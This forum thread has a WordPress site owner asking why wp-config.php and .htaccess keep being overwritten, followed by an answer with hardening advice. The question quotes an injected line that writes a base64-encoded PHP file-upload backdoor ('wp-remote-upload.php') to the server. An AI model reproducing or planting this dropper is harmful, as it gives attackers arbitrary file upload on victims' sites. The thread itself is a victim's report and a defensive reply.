htaccess and wordpress config files are regularly over written

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.

This results in two problems – first the DB access details in wp-config are changed to something don’t work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.

After being overwritten, my wp-config file is full of lines like this:

file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));

My wp-config file has so many of these lines that it is about 800Kb in size.

The plugins I am using on my WordPress site are as follows:

• Akismet Anti-Spam [v4.0.1 by Automattic]
• Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
• Duplicator [v1.2.3 by Snap Creek]
• Google Analytics for WordPress [v7.7.1 by MonsterInsights]
• Hello Dolly [v1.6 by Matt Mullenweg]
• Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
• Logo Slider [v1.4.7 by EnigmaWeb]
• Recent Posts Widget Extended [v0.9.9.7 by Satrya]
• Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
• WordPress Importer [v0.6.3 by wordpressdotorg]
• Yoast SEO [v5.9.1 by Team Yoast]

Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to – however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.

How do I stop these files from being over written?

Or how I can discover what is responsible for changing these files?

If this is happening on a regular basis, your security plugins appear to be failing.

Below are several steps you can take to prevent this:

• Start by using a really good security plugin like Wordfence Security. I haven’t had a successful hacking incident since I started using this.

If that fails, or you just want an EXTRA STRONG lock-down, you can also try the following. I have done the Microsoft equivalent on our intranet site to avoid accidental file modifications/deletions by my less informed hardware admins. This lock-down requires you to manually unlock everything every time you perform a plugin or theme install/update/deletion, or ANYTHING. (read: Last Resort).

• Use chmod (or your file manager) to remove write privileges from key files like .htaccess and most PHP files in your WordPress root.
• Use the methods detailed in this answer to protect against unintentional host updates and root access.

For further reading (if you’re having trouble sleeping, avoid this, it can cause nightmares), Kinsta has an outstanding article on WordPress vulnerabilities and how to avoid them.